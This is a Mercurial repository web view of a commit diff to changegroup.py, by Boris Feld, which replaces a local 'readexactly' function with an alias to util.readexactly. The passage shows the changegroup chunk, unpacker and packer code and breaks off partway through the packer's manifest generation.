##// END OF EJS Templates
util: move 'readexactly' into the util module...
Boris Feld -
r35772:fb0be099 default
parent child Browse files
Show More
@@ -1,1003 +1,996 b''
1 # changegroup.py - Mercurial changegroup manipulation functions
1 # changegroup.py - Mercurial changegroup manipulation functions
2 #
2 #
3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import os
10 import os
11 import struct
11 import struct
12 import tempfile
12 import tempfile
13 import weakref
13 import weakref
14
14
15 from .i18n import _
15 from .i18n import _
16 from .node import (
16 from .node import (
17 hex,
17 hex,
18 nullrev,
18 nullrev,
19 short,
19 short,
20 )
20 )
21
21
22 from . import (
22 from . import (
23 dagutil,
23 dagutil,
24 error,
24 error,
25 mdiff,
25 mdiff,
26 phases,
26 phases,
27 pycompat,
27 pycompat,
28 util,
28 util,
29 )
29 )
30
30
# struct format strings for the per-revision delta headers of each
# changegroup wire-format version (see struct.calcsize/unpack usage in
# the cg*unpacker classes below):
#   v1: node, p1, p2, linknode (four 20-byte hashes)
#   v2: adds an explicit deltabase node
#   v3: big-endian, adds a 16-bit flags field
_CHANGEGROUPV1_DELTA_HEADER = "20s20s20s20s"
_CHANGEGROUPV2_DELTA_HEADER = "20s20s20s20s20s"
_CHANGEGROUPV3_DELTA_HEADER = ">20s20s20s20s20sH"

# 'readexactly' now lives in the util module; keep a module-level alias
# so existing callers of changegroup.readexactly keep working.
readexactly = util.readexactly
def getchunk(stream):
    """return the next chunk from stream as a string"""
    header = readexactly(stream, 4)
    length = struct.unpack(">l", header)[0]
    # the on-wire length includes the 4-byte header itself, so anything
    # larger than 4 carries a payload
    if length > 4:
        return readexactly(stream, length - 4)
    if length:
        # 1..4 (or negative) can never be a valid chunk length
        raise error.Abort(_("invalid chunk length %d") % length)
    # a zero length marks the end of a chunk sequence
    return ""
53
46
def chunkheader(length):
    """return a changegroup chunk header (string)"""
    # the wire length counts the 4-byte header in addition to the payload
    return struct.pack(">l", 4 + length)
57
50
def closechunk():
    """return a changegroup chunk header (string) for a zero-length chunk"""
    # a zero on-wire length terminates a sequence of chunks
    return struct.pack('>l', 0)
61
54
def writechunks(ui, chunks, filename, vfs=None):
    """Write chunks to a file and return its filename.

    The stream is assumed to be a bundle file.
    Existing files will not be overwritten.
    If no filename is specified, a temporary file is created.
    """
    fh = None
    cleanup = None
    try:
        if not filename:
            fd, filename = tempfile.mkstemp(prefix="hg-bundle-", suffix=".hg")
            fh = os.fdopen(fd, pycompat.sysstr("wb"))
        elif vfs:
            fh = vfs.open(filename, "wb")
        else:
            # Increase default buffer size because default is usually
            # small (4k is common on Linux).
            fh = open(filename, "wb", 131072)
        # remember the file so it can be removed if writing fails midway
        cleanup = filename
        for chunk in chunks:
            fh.write(chunk)
        cleanup = None  # success: nothing to remove
        return filename
    finally:
        if fh is not None:
            fh.close()
        if cleanup is not None:
            if filename and vfs:
                vfs.unlink(cleanup)
            else:
                os.unlink(cleanup)
95
88
class cg1unpacker(object):
    """Unpacker for cg1 changegroup streams.

    A changegroup unpacker handles the framing of the revision data in
    the wire format. Most consumers will want to use the apply()
    method to add the changes from the changegroup to a repository.

    If you're forwarding a changegroup unmodified to another consumer,
    use getchunks(), which returns an iterator of changegroup
    chunks. This is mostly useful for cases where you need to know the
    data stream has ended by observing the end of the changegroup.

    deltachunk() is useful only if you're applying delta data. Most
    consumers should prefer apply() instead.

    A few other public methods exist. Those are used only for
    bundlerepo and some debug commands - their use is discouraged.
    """
    deltaheader = _CHANGEGROUPV1_DELTA_HEADER
    deltaheadersize = struct.calcsize(deltaheader)
    version = '01'
    _grouplistcount = 1 # One list of files after the manifests

    def __init__(self, fh, alg, extras=None):
        """Wrap stream *fh*, decompressing with bundle compression *alg*.

        alg of None is treated as 'UN' (uncompressed). Raises
        error.Abort for unknown compression types.
        """
        if alg is None:
            alg = 'UN'
        if alg not in util.compengines.supportedbundletypes:
            raise error.Abort(_('unknown stream compression type: %s')
                              % alg)
        if alg == 'BZ':
            # bundle data lacks the usual 'BZ' magic; use the engine
            # variant that copes with a truncated header
            alg = '_truncatedBZ'

        compengine = util.compengines.forbundletype(alg)
        self._stream = compengine.decompressorreader(fh)
        self._type = alg
        self.extras = extras or {}
        # optional progress callback invoked per non-empty chunk
        self.callback = None

    # These methods (compressed, read, seek, tell) all appear to only
    # be used by bundlerepo, but it's a little hard to tell.
    def compressed(self):
        return self._type is not None and self._type != 'UN'
    def read(self, l):
        return self._stream.read(l)
    def seek(self, pos):
        return self._stream.seek(pos)
    def tell(self):
        return self._stream.tell()
    def close(self):
        return self._stream.close()

    def _chunklength(self):
        """Read the next 4-byte chunk header and return the payload size.

        Returns 0 at an end-of-sequence marker; aborts on a length in
        the impossible 1..4 (or negative) range. Fires self.callback,
        if set, for every non-empty chunk.
        """
        d = readexactly(self._stream, 4)
        l = struct.unpack(">l", d)[0]
        if l <= 4:
            if l:
                raise error.Abort(_("invalid chunk length %d") % l)
            return 0
        if self.callback:
            self.callback()
        # on-wire length includes the 4-byte header itself
        return l - 4

    def changelogheader(self):
        """v10 does not have a changelog header chunk"""
        return {}

    def manifestheader(self):
        """v10 does not have a manifest header chunk"""
        return {}

    def filelogheader(self):
        """return the header of the filelogs chunk, v10 only has the filename"""
        l = self._chunklength()
        if not l:
            return {}
        fname = readexactly(self._stream, l)
        return {'filename': fname}

    def _deltaheader(self, headertuple, prevnode):
        """Decode an unpacked cg1 delta header tuple.

        cg1 has no explicit delta base: deltas chain off the previous
        node in the stream, or off p1 for the first one.
        """
        node, p1, p2, cs = headertuple
        if prevnode is None:
            deltabase = p1
        else:
            deltabase = prevnode
        flags = 0
        return node, p1, p2, deltabase, cs, flags

    def deltachunk(self, prevnode):
        """Read one delta chunk from the stream.

        Returns {} at the end of the current group, otherwise the tuple
        (node, p1, p2, cs, deltabase, delta, flags).
        """
        l = self._chunklength()
        if not l:
            return {}
        headerdata = readexactly(self._stream, self.deltaheadersize)
        header = struct.unpack(self.deltaheader, headerdata)
        delta = readexactly(self._stream, l - self.deltaheadersize)
        node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
        return (node, p1, p2, cs, deltabase, delta, flags)

    def getchunks(self):
        """returns all the chunks contains in the bundle

        Used when you need to forward the binary stream to a file or another
        network API. To do so, it parse the changegroup data, otherwise it will
        block in case of sshrepo because it don't know the end of the stream.
        """
        # For changegroup 1 and 2, we expect 3 parts: changelog, manifestlog,
        # and a list of filelogs. For changegroup 3, we expect 4 parts:
        # changelog, manifestlog, a list of tree manifestlogs, and a list of
        # filelogs.
        #
        # Changelog and manifestlog parts are terminated with empty chunks. The
        # tree and file parts are a list of entry sections. Each entry section
        # is a series of chunks terminating in an empty chunk. The list of these
        # entry sections is terminated in yet another empty chunk, so we know
        # we've reached the end of the tree/file list when we reach an empty
        # chunk that was proceeded by no non-empty chunks.

        parts = 0
        while parts < 2 + self._grouplistcount:
            noentries = True
            while True:
                chunk = getchunk(self)
                if not chunk:
                    # The first two empty chunks represent the end of the
                    # changelog and the manifestlog portions. The remaining
                    # empty chunks represent either A) the end of individual
                    # tree or file entries in the file list, or B) the end of
                    # the entire list. It's the end of the entire list if there
                    # were no entries (i.e. noentries is True).
                    if parts < 2:
                        parts += 1
                    elif noentries:
                        parts += 1
                    break
                noentries = False
                yield chunkheader(len(chunk))
                pos = 0
                # re-emit the payload in 1MB slices
                while pos < len(chunk):
                    next = pos + 2**20
                    yield chunk[pos:next]
                    pos = next
            yield closechunk()

    def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
        """Read the manifest group and add it to repo's manifest revlog."""
        # We know that we'll never have more manifests than we had
        # changesets.
        self.callback = prog(_('manifests'), numchanges)
        # no need to check for empty manifest group here:
        # if the result of the merge of 1 and 2 is the same in 3 and 4,
        # no new manifest will be created and the manifest group will
        # be empty during the pull
        self.manifestheader()
        deltas = self.deltaiter()
        repo.manifestlog._revlog.addgroup(deltas, revmap, trp)
        repo.ui.progress(_('manifests'), None)
        self.callback = None

    def apply(self, repo, tr, srctype, url, targetphase=phases.draft,
              expectedtotal=None):
        """Add the changegroup returned by source.read() to this repo.
        srctype is a string like 'push', 'pull', or 'unbundle'. url is
        the URL of the repo where this changegroup is coming from.

        Return an integer summarizing the change to this repo:
        - nothing changed or no source: 0
        - more heads than before: 1+added heads (2..n)
        - fewer heads than before: -1-removed heads (-2..-n)
        - number of heads stays the same: 1
        """
        repo = repo.unfiltered()
        def csmap(x):
            repo.ui.debug("add changeset %s\n" % short(x))
            return len(cl)

        def revmap(x):
            return cl.rev(x)

        changesets = files = revisions = 0

        try:
            # The transaction may already carry source information. In this
            # case we use the top level data. We overwrite the argument
            # because we need to use the top level value (if they exist)
            # in this function.
            srctype = tr.hookargs.setdefault('source', srctype)
            url = tr.hookargs.setdefault('url', url)
            repo.hook('prechangegroup',
                      throw=True, **pycompat.strkwargs(tr.hookargs))

            # write changelog data to temp files so concurrent readers
            # will not see an inconsistent view
            cl = repo.changelog
            cl.delayupdate(tr)
            oldheads = set(cl.heads())

            trp = weakref.proxy(tr)
            # pull off the changeset group
            repo.ui.status(_("adding changesets\n"))
            clstart = len(cl)
            # per-chunk progress callback factory handed to the unpackers
            class prog(object):
                def __init__(self, step, total):
                    self._step = step
                    self._total = total
                    self._count = 1
                def __call__(self):
                    repo.ui.progress(self._step, self._count, unit=_('chunks'),
                                     total=self._total)
                    self._count += 1
            self.callback = prog(_('changesets'), expectedtotal)

            efiles = set()
            def onchangelog(cl, node):
                efiles.update(cl.readfiles(node))

            self.changelogheader()
            deltas = self.deltaiter()
            cgnodes = cl.addgroup(deltas, csmap, trp, addrevisioncb=onchangelog)
            # collapse the set of touched files to its count
            efiles = len(efiles)

            if not cgnodes:
                repo.ui.develwarn('applied empty changegroup',
                                  config='warn-empty-changegroup')
            clend = len(cl)
            changesets = clend - clstart
            repo.ui.progress(_('changesets'), None)
            self.callback = None

            # pull off the manifest group
            repo.ui.status(_("adding manifests\n"))
            self._unpackmanifests(repo, revmap, trp, prog, changesets)

            needfiles = {}
            if repo.ui.configbool('server', 'validate'):
                cl = repo.changelog
                ml = repo.manifestlog
                # validate incoming csets have their manifests
                for cset in xrange(clstart, clend):
                    mfnode = cl.changelogrevision(cset).manifest
                    mfest = ml[mfnode].readdelta()
                    # store file cgnodes we must see
                    for f, n in mfest.iteritems():
                        needfiles.setdefault(f, set()).add(n)

            # process the files
            repo.ui.status(_("adding file changes\n"))
            newrevs, newfiles = _addchangegroupfiles(
                repo, self, revmap, trp, efiles, needfiles)
            revisions += newrevs
            files += newfiles

            deltaheads = 0
            if oldheads:
                heads = cl.heads()
                deltaheads = len(heads) - len(oldheads)
                for h in heads:
                    # heads that close a branch don't count towards the delta
                    if h not in oldheads and repo[h].closesbranch():
                        deltaheads -= 1
            htext = ""
            if deltaheads:
                htext = _(" (%+d heads)") % deltaheads

            repo.ui.status(_("added %d changesets"
                             " with %d changes to %d files%s\n")
                           % (changesets, revisions, files, htext))
            repo.invalidatevolatilesets()

            if changesets > 0:
                if 'node' not in tr.hookargs:
                    tr.hookargs['node'] = hex(cl.node(clstart))
                    tr.hookargs['node_last'] = hex(cl.node(clend - 1))
                    hookargs = dict(tr.hookargs)
                else:
                    # node info already present: only override the local copy
                    hookargs = dict(tr.hookargs)
                    hookargs['node'] = hex(cl.node(clstart))
                    hookargs['node_last'] = hex(cl.node(clend - 1))
                repo.hook('pretxnchangegroup',
                          throw=True, **pycompat.strkwargs(hookargs))

            added = [cl.node(r) for r in xrange(clstart, clend)]
            phaseall = None
            if srctype in ('push', 'serve'):
                # Old servers can not push the boundary themselves.
                # New servers won't push the boundary if changeset already
                # exists locally as secret
                #
                # We should not use added here but the list of all change in
                # the bundle
                if repo.publishing():
                    targetphase = phaseall = phases.public
                else:
                    # closer target phase computation

                    # Those changesets have been pushed from the
                    # outside, their phases are going to be pushed
                    # alongside. Therefor `targetphase` is
                    # ignored.
                    targetphase = phaseall = phases.draft
            if added:
                phases.registernew(repo, tr, targetphase, added)
            if phaseall is not None:
                phases.advanceboundary(repo, tr, phaseall, cgnodes)

            if changesets > 0:

                def runhooks():
                    # These hooks run when the lock releases, not when the
                    # transaction closes. So it's possible for the changelog
                    # to have changed since we last saw it.
                    if clstart >= len(repo):
                        return

                    repo.hook("changegroup", **pycompat.strkwargs(hookargs))

                    for n in added:
                        args = hookargs.copy()
                        args['node'] = hex(n)
                        del args['node_last']
                        repo.hook("incoming", **pycompat.strkwargs(args))

                    newheads = [h for h in repo.heads()
                                if h not in oldheads]
                    repo.ui.log("incoming",
                                "%s incoming changes - new heads: %s\n",
                                len(added),
                                ', '.join([hex(c[:6]) for c in newheads]))

                tr.addpostclose('changegroup-runhooks-%020i' % clstart,
                                lambda tr: repo._afterlock(runhooks))
        finally:
            repo.ui.flush()
        # never return 0 here:
        if deltaheads < 0:
            ret = deltaheads - 1
        else:
            ret = deltaheads + 1
        return ret

    def deltaiter(self):
        """
        returns an iterator of the deltas in this changegroup

        Useful for passing to the underlying storage system to be stored.
        """
        chain = None
        for chunkdata in iter(lambda: self.deltachunk(chain), {}):
            # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
            yield chunkdata
            chain = chunkdata[0]
443
436
class cg2unpacker(cg1unpacker):
    """Unpacker for cg2 streams.

    cg2 streams add support for generaldelta, so the delta header
    format is slightly different. All other features about the data
    remain the same.
    """
    deltaheader = _CHANGEGROUPV2_DELTA_HEADER
    deltaheadersize = struct.calcsize(deltaheader)
    version = '02'

    def _deltaheader(self, headertuple, prevnode):
        # unlike cg1, the delta base is carried explicitly in the header,
        # so prevnode is unused here
        node, p1, p2, deltabase, cs = headertuple
        flags = 0
        return node, p1, p2, deltabase, cs, flags
459
452
class cg3unpacker(cg2unpacker):
    """Unpacker for cg3 streams.

    cg3 streams add support for exchanging treemanifests and revlog
    flags. It adds the revlog flags to the delta header and an empty chunk
    separating manifests and files.
    """
    deltaheader = _CHANGEGROUPV3_DELTA_HEADER
    deltaheadersize = struct.calcsize(deltaheader)
    version = '03'
    _grouplistcount = 2 # One list of manifests and one list of files

    def _deltaheader(self, headertuple, prevnode):
        # cg3 headers already carry the full 6-tuple including flags
        node, p1, p2, deltabase, cs, flags = headertuple
        return node, p1, p2, deltabase, cs, flags

    def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
        """Unpack the root manifest group, then any tree manifest groups."""
        super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog,
                                                  numchanges)
        for chunkdata in iter(self.filelogheader, {}):
            # If we get here, there are directory manifests in the changegroup
            d = chunkdata["filename"]
            repo.ui.debug("adding %s revisions\n" % d)
            dirlog = repo.manifestlog._revlog.dirlog(d)
            deltas = self.deltaiter()
            if not dirlog.addgroup(deltas, revmap, trp):
                raise error.Abort(_("received dir revlog group is empty"))
487
480
class headerlessfixup(object):
    """File-like wrapper replaying already-consumed header bytes.

    *h* holds bytes that were read off *fh* ahead of time (e.g. to sniff
    a bundle header); read() serves them back before touching the
    underlying stream again.
    """
    def __init__(self, fh, h):
        self._h = h
        self._fh = fh
    def read(self, n):
        if not self._h:
            # buffered header exhausted: read straight from the stream
            return readexactly(self._fh, n)
        d, self._h = self._h[:n], self._h[n:]
        if len(d) < n:
            # header didn't cover the request; top up from the stream
            d += readexactly(self._fh, n - len(d))
        return d
499
492
500 class cg1packer(object):
493 class cg1packer(object):
501 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
494 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
502 version = '01'
495 version = '01'
503 def __init__(self, repo, bundlecaps=None):
496 def __init__(self, repo, bundlecaps=None):
504 """Given a source repo, construct a bundler.
497 """Given a source repo, construct a bundler.
505
498
506 bundlecaps is optional and can be used to specify the set of
499 bundlecaps is optional and can be used to specify the set of
507 capabilities which can be used to build the bundle. While bundlecaps is
500 capabilities which can be used to build the bundle. While bundlecaps is
508 unused in core Mercurial, extensions rely on this feature to communicate
501 unused in core Mercurial, extensions rely on this feature to communicate
509 capabilities to customize the changegroup packer.
502 capabilities to customize the changegroup packer.
510 """
503 """
511 # Set of capabilities we can use to build the bundle.
504 # Set of capabilities we can use to build the bundle.
512 if bundlecaps is None:
505 if bundlecaps is None:
513 bundlecaps = set()
506 bundlecaps = set()
514 self._bundlecaps = bundlecaps
507 self._bundlecaps = bundlecaps
515 # experimental config: bundle.reorder
508 # experimental config: bundle.reorder
516 reorder = repo.ui.config('bundle', 'reorder')
509 reorder = repo.ui.config('bundle', 'reorder')
517 if reorder == 'auto':
510 if reorder == 'auto':
518 reorder = None
511 reorder = None
519 else:
512 else:
520 reorder = util.parsebool(reorder)
513 reorder = util.parsebool(reorder)
521 self._repo = repo
514 self._repo = repo
522 self._reorder = reorder
515 self._reorder = reorder
523 self._progress = repo.ui.progress
516 self._progress = repo.ui.progress
524 if self._repo.ui.verbose and not self._repo.ui.debugflag:
517 if self._repo.ui.verbose and not self._repo.ui.debugflag:
525 self._verbosenote = self._repo.ui.note
518 self._verbosenote = self._repo.ui.note
526 else:
519 else:
527 self._verbosenote = lambda s: None
520 self._verbosenote = lambda s: None
528
521
529 def close(self):
522 def close(self):
530 return closechunk()
523 return closechunk()
531
524
532 def fileheader(self, fname):
525 def fileheader(self, fname):
533 return chunkheader(len(fname)) + fname
526 return chunkheader(len(fname)) + fname
534
527
535 # Extracted both for clarity and for overriding in extensions.
528 # Extracted both for clarity and for overriding in extensions.
536 def _sortgroup(self, revlog, nodelist, lookup):
529 def _sortgroup(self, revlog, nodelist, lookup):
537 """Sort nodes for change group and turn them into revnums."""
530 """Sort nodes for change group and turn them into revnums."""
538 # for generaldelta revlogs, we linearize the revs; this will both be
531 # for generaldelta revlogs, we linearize the revs; this will both be
539 # much quicker and generate a much smaller bundle
532 # much quicker and generate a much smaller bundle
540 if (revlog._generaldelta and self._reorder is None) or self._reorder:
533 if (revlog._generaldelta and self._reorder is None) or self._reorder:
541 dag = dagutil.revlogdag(revlog)
534 dag = dagutil.revlogdag(revlog)
542 return dag.linearize(set(revlog.rev(n) for n in nodelist))
535 return dag.linearize(set(revlog.rev(n) for n in nodelist))
543 else:
536 else:
544 return sorted([revlog.rev(n) for n in nodelist])
537 return sorted([revlog.rev(n) for n in nodelist])
545
538
546 def group(self, nodelist, revlog, lookup, units=None):
539 def group(self, nodelist, revlog, lookup, units=None):
547 """Calculate a delta group, yielding a sequence of changegroup chunks
540 """Calculate a delta group, yielding a sequence of changegroup chunks
548 (strings).
541 (strings).
549
542
550 Given a list of changeset revs, return a set of deltas and
543 Given a list of changeset revs, return a set of deltas and
551 metadata corresponding to nodes. The first delta is
544 metadata corresponding to nodes. The first delta is
552 first parent(nodelist[0]) -> nodelist[0], the receiver is
545 first parent(nodelist[0]) -> nodelist[0], the receiver is
553 guaranteed to have this parent as it has all history before
546 guaranteed to have this parent as it has all history before
554 these changesets. In the case firstparent is nullrev the
547 these changesets. In the case firstparent is nullrev the
555 changegroup starts with a full revision.
548 changegroup starts with a full revision.
556
549
557 If units is not None, progress detail will be generated, units specifies
550 If units is not None, progress detail will be generated, units specifies
558 the type of revlog that is touched (changelog, manifest, etc.).
551 the type of revlog that is touched (changelog, manifest, etc.).
559 """
552 """
560 # if we don't have any revisions touched by these changesets, bail
553 # if we don't have any revisions touched by these changesets, bail
561 if len(nodelist) == 0:
554 if len(nodelist) == 0:
562 yield self.close()
555 yield self.close()
563 return
556 return
564
557
565 revs = self._sortgroup(revlog, nodelist, lookup)
558 revs = self._sortgroup(revlog, nodelist, lookup)
566
559
567 # add the parent of the first rev
560 # add the parent of the first rev
568 p = revlog.parentrevs(revs[0])[0]
561 p = revlog.parentrevs(revs[0])[0]
569 revs.insert(0, p)
562 revs.insert(0, p)
570
563
571 # build deltas
564 # build deltas
572 total = len(revs) - 1
565 total = len(revs) - 1
573 msgbundling = _('bundling')
566 msgbundling = _('bundling')
574 for r in xrange(len(revs) - 1):
567 for r in xrange(len(revs) - 1):
575 if units is not None:
568 if units is not None:
576 self._progress(msgbundling, r + 1, unit=units, total=total)
569 self._progress(msgbundling, r + 1, unit=units, total=total)
577 prev, curr = revs[r], revs[r + 1]
570 prev, curr = revs[r], revs[r + 1]
578 linknode = lookup(revlog.node(curr))
571 linknode = lookup(revlog.node(curr))
579 for c in self.revchunk(revlog, curr, prev, linknode):
572 for c in self.revchunk(revlog, curr, prev, linknode):
580 yield c
573 yield c
581
574
582 if units is not None:
575 if units is not None:
583 self._progress(msgbundling, None)
576 self._progress(msgbundling, None)
584 yield self.close()
577 yield self.close()
585
578
586 # filter any nodes that claim to be part of the known set
579 # filter any nodes that claim to be part of the known set
587 def prune(self, revlog, missing, commonrevs):
580 def prune(self, revlog, missing, commonrevs):
588 rr, rl = revlog.rev, revlog.linkrev
581 rr, rl = revlog.rev, revlog.linkrev
589 return [n for n in missing if rl(rr(n)) not in commonrevs]
582 return [n for n in missing if rl(rr(n)) not in commonrevs]
590
583
591 def _packmanifests(self, dir, mfnodes, lookuplinknode):
584 def _packmanifests(self, dir, mfnodes, lookuplinknode):
592 """Pack flat manifests into a changegroup stream."""
585 """Pack flat manifests into a changegroup stream."""
593 assert not dir
586 assert not dir
594 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
587 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
595 lookuplinknode, units=_('manifests')):
588 lookuplinknode, units=_('manifests')):
596 yield chunk
589 yield chunk
597
590
598 def _manifestsdone(self):
591 def _manifestsdone(self):
599 return ''
592 return ''
600
593
601 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
594 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
602 '''yield a sequence of changegroup chunks (strings)'''
595 '''yield a sequence of changegroup chunks (strings)'''
603 repo = self._repo
596 repo = self._repo
604 cl = repo.changelog
597 cl = repo.changelog
605
598
606 clrevorder = {}
599 clrevorder = {}
607 mfs = {} # needed manifests
600 mfs = {} # needed manifests
608 fnodes = {} # needed file nodes
601 fnodes = {} # needed file nodes
609 changedfiles = set()
602 changedfiles = set()
610
603
611 # Callback for the changelog, used to collect changed files and manifest
604 # Callback for the changelog, used to collect changed files and manifest
612 # nodes.
605 # nodes.
613 # Returns the linkrev node (identity in the changelog case).
606 # Returns the linkrev node (identity in the changelog case).
614 def lookupcl(x):
607 def lookupcl(x):
615 c = cl.read(x)
608 c = cl.read(x)
616 clrevorder[x] = len(clrevorder)
609 clrevorder[x] = len(clrevorder)
617 n = c[0]
610 n = c[0]
618 # record the first changeset introducing this manifest version
611 # record the first changeset introducing this manifest version
619 mfs.setdefault(n, x)
612 mfs.setdefault(n, x)
620 # Record a complete list of potentially-changed files in
613 # Record a complete list of potentially-changed files in
621 # this manifest.
614 # this manifest.
622 changedfiles.update(c[3])
615 changedfiles.update(c[3])
623 return x
616 return x
624
617
625 self._verbosenote(_('uncompressed size of bundle content:\n'))
618 self._verbosenote(_('uncompressed size of bundle content:\n'))
626 size = 0
619 size = 0
627 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
620 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
628 size += len(chunk)
621 size += len(chunk)
629 yield chunk
622 yield chunk
630 self._verbosenote(_('%8.i (changelog)\n') % size)
623 self._verbosenote(_('%8.i (changelog)\n') % size)
631
624
632 # We need to make sure that the linkrev in the changegroup refers to
625 # We need to make sure that the linkrev in the changegroup refers to
633 # the first changeset that introduced the manifest or file revision.
626 # the first changeset that introduced the manifest or file revision.
634 # The fastpath is usually safer than the slowpath, because the filelogs
627 # The fastpath is usually safer than the slowpath, because the filelogs
635 # are walked in revlog order.
628 # are walked in revlog order.
636 #
629 #
637 # When taking the slowpath with reorder=None and the manifest revlog
630 # When taking the slowpath with reorder=None and the manifest revlog
638 # uses generaldelta, the manifest may be walked in the "wrong" order.
631 # uses generaldelta, the manifest may be walked in the "wrong" order.
639 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
632 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
640 # cc0ff93d0c0c).
633 # cc0ff93d0c0c).
641 #
634 #
642 # When taking the fastpath, we are only vulnerable to reordering
635 # When taking the fastpath, we are only vulnerable to reordering
643 # of the changelog itself. The changelog never uses generaldelta, so
636 # of the changelog itself. The changelog never uses generaldelta, so
644 # it is only reordered when reorder=True. To handle this case, we
637 # it is only reordered when reorder=True. To handle this case, we
645 # simply take the slowpath, which already has the 'clrevorder' logic.
638 # simply take the slowpath, which already has the 'clrevorder' logic.
646 # This was also fixed in cc0ff93d0c0c.
639 # This was also fixed in cc0ff93d0c0c.
647 fastpathlinkrev = fastpathlinkrev and not self._reorder
640 fastpathlinkrev = fastpathlinkrev and not self._reorder
648 # Treemanifests don't work correctly with fastpathlinkrev
641 # Treemanifests don't work correctly with fastpathlinkrev
649 # either, because we don't discover which directory nodes to
642 # either, because we don't discover which directory nodes to
650 # send along with files. This could probably be fixed.
643 # send along with files. This could probably be fixed.
651 fastpathlinkrev = fastpathlinkrev and (
644 fastpathlinkrev = fastpathlinkrev and (
652 'treemanifest' not in repo.requirements)
645 'treemanifest' not in repo.requirements)
653
646
654 for chunk in self.generatemanifests(commonrevs, clrevorder,
647 for chunk in self.generatemanifests(commonrevs, clrevorder,
655 fastpathlinkrev, mfs, fnodes, source):
648 fastpathlinkrev, mfs, fnodes, source):
656 yield chunk
649 yield chunk
657 mfs.clear()
650 mfs.clear()
658 clrevs = set(cl.rev(x) for x in clnodes)
651 clrevs = set(cl.rev(x) for x in clnodes)
659
652
660 if not fastpathlinkrev:
653 if not fastpathlinkrev:
661 def linknodes(unused, fname):
654 def linknodes(unused, fname):
662 return fnodes.get(fname, {})
655 return fnodes.get(fname, {})
663 else:
656 else:
664 cln = cl.node
657 cln = cl.node
665 def linknodes(filerevlog, fname):
658 def linknodes(filerevlog, fname):
666 llr = filerevlog.linkrev
659 llr = filerevlog.linkrev
667 fln = filerevlog.node
660 fln = filerevlog.node
668 revs = ((r, llr(r)) for r in filerevlog)
661 revs = ((r, llr(r)) for r in filerevlog)
669 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
662 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
670
663
671 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
664 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
672 source):
665 source):
673 yield chunk
666 yield chunk
674
667
675 yield self.close()
668 yield self.close()
676
669
677 if clnodes:
670 if clnodes:
678 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
671 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
679
672
680 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
673 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
681 fnodes, source):
674 fnodes, source):
682 """Returns an iterator of changegroup chunks containing manifests.
675 """Returns an iterator of changegroup chunks containing manifests.
683
676
684 `source` is unused here, but is used by extensions like remotefilelog to
677 `source` is unused here, but is used by extensions like remotefilelog to
685 change what is sent based in pulls vs pushes, etc.
678 change what is sent based in pulls vs pushes, etc.
686 """
679 """
687 repo = self._repo
680 repo = self._repo
688 mfl = repo.manifestlog
681 mfl = repo.manifestlog
689 dirlog = mfl._revlog.dirlog
682 dirlog = mfl._revlog.dirlog
690 tmfnodes = {'': mfs}
683 tmfnodes = {'': mfs}
691
684
692 # Callback for the manifest, used to collect linkrevs for filelog
685 # Callback for the manifest, used to collect linkrevs for filelog
693 # revisions.
686 # revisions.
694 # Returns the linkrev node (collected in lookupcl).
687 # Returns the linkrev node (collected in lookupcl).
695 def makelookupmflinknode(dir, nodes):
688 def makelookupmflinknode(dir, nodes):
696 if fastpathlinkrev:
689 if fastpathlinkrev:
697 assert not dir
690 assert not dir
698 return mfs.__getitem__
691 return mfs.__getitem__
699
692
700 def lookupmflinknode(x):
693 def lookupmflinknode(x):
701 """Callback for looking up the linknode for manifests.
694 """Callback for looking up the linknode for manifests.
702
695
703 Returns the linkrev node for the specified manifest.
696 Returns the linkrev node for the specified manifest.
704
697
705 SIDE EFFECT:
698 SIDE EFFECT:
706
699
707 1) fclnodes gets populated with the list of relevant
700 1) fclnodes gets populated with the list of relevant
708 file nodes if we're not using fastpathlinkrev
701 file nodes if we're not using fastpathlinkrev
709 2) When treemanifests are in use, collects treemanifest nodes
702 2) When treemanifests are in use, collects treemanifest nodes
710 to send
703 to send
711
704
712 Note that this means manifests must be completely sent to
705 Note that this means manifests must be completely sent to
713 the client before you can trust the list of files and
706 the client before you can trust the list of files and
714 treemanifests to send.
707 treemanifests to send.
715 """
708 """
716 clnode = nodes[x]
709 clnode = nodes[x]
717 mdata = mfl.get(dir, x).readfast(shallow=True)
710 mdata = mfl.get(dir, x).readfast(shallow=True)
718 for p, n, fl in mdata.iterentries():
711 for p, n, fl in mdata.iterentries():
719 if fl == 't': # subdirectory manifest
712 if fl == 't': # subdirectory manifest
720 subdir = dir + p + '/'
713 subdir = dir + p + '/'
721 tmfclnodes = tmfnodes.setdefault(subdir, {})
714 tmfclnodes = tmfnodes.setdefault(subdir, {})
722 tmfclnode = tmfclnodes.setdefault(n, clnode)
715 tmfclnode = tmfclnodes.setdefault(n, clnode)
723 if clrevorder[clnode] < clrevorder[tmfclnode]:
716 if clrevorder[clnode] < clrevorder[tmfclnode]:
724 tmfclnodes[n] = clnode
717 tmfclnodes[n] = clnode
725 else:
718 else:
726 f = dir + p
719 f = dir + p
727 fclnodes = fnodes.setdefault(f, {})
